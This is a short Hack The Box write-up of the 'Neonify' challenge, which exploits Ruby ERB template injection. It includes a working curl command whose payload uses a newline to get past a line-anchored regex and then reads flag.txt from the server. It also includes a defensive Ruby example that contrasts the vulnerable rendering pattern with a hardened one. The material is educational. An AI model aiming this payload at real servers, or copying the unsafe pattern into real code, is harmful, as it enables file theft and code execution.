HackTheBox Neonify Writeup
Explore the basics of cybersecurity in the Neonify Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/303
Description
It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!
Exploitation
curl http://94.237.60.154:35761/ -s -X POST -d 'neon=a%0A%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E' | grep -Eo 'HTB{.*}'
Summary
Neonify is an easy-level challenge on Hack The Box built around a server-side template injection (SSTI) vulnerability. Sending a crafted payload (<%= File.open('flag.txt').read %>) in a POST request causes the server to execute the embedded Ruby code and return the content of flag.txt; the flag is then extracted from the response with grep. The challenge demonstrates the danger of placing unvalidated user input into a template that is subsequently rendered.
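To make the root cause concrete, here is an added Ruby example (not code from the challenge or from Hack The Box) showing the two defects a defender would look for in an ERB-based page like this one. It assumes, as a hypothesis, that the application interpolated the submitted text directly into an ERB template string and guarded it with a regex anchored by ^ and $; the leading a%0A in the payload above is consistent with that, since in Ruby ^ and $ match at line boundaries, so a clean first line satisfies the check while later lines carry ERB tags. The hardened variant passes the input to the template as a variable, HTML-escapes it, and validates the whole string with \A and \z. The code execution demonstrated here is a harmless arithmetic expression.

```ruby
require "erb"
require "cgi"

# Vulnerable pattern (hypothetical reconstruction, not the challenge's code):
# the user's text becomes part of the template source, so any <%= %> tag in
# it is evaluated as Ruby when the template is rendered.
def neonify_unsafe(text)
  ERB.new("<span class='neon'>#{text}</span>").result(binding)
end

# Hardened pattern: the template source is fixed, the input is supplied as a
# variable and HTML-escaped, so ERB tags in the input are rendered as text.
NEON_TEMPLATE = ERB.new("<span class='neon'><%= CGI.escapeHTML(text) %></span>")

def neonify_safe(text)
  NEON_TEMPLATE.result_with_hash(text: text)
end

# Validation pitfall: in Ruby, ^ and $ anchor to the start and end of a LINE,
# so a multi-line input passes as long as one line is clean. \A and \z anchor
# to the start and end of the whole string and reject the newline trick.
PER_LINE_CHECK     = /^[a-zA-Z0-9 ]+$/
WHOLE_STRING_CHECK = /\A[a-zA-Z0-9 ]+\z/

def passes_per_line_check?(text)
  PER_LINE_CHECK.match?(text)
end

def passes_whole_string_check?(text)
  WHOLE_STRING_CHECK.match?(text)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample input: a clean first line followed by an ERB tag.
  sample = "a\n<%= 1 + 1 %>"
  puts "per-line regex accepts input:     #{passes_per_line_check?(sample)}"
  puts "whole-string regex accepts input: #{passes_whole_string_check?(sample)}"
  puts "unsafe render: #{neonify_unsafe(sample).inspect}"
  puts "safe render:   #{neonify_safe(sample).inspect}"
end
```

Run with `ruby neonify_demo.rb`. The unsafe render prints the evaluated result (2) inside the span, while the safe render prints the escaped tag text, and only the \A...\z regex rejects the multi-line input.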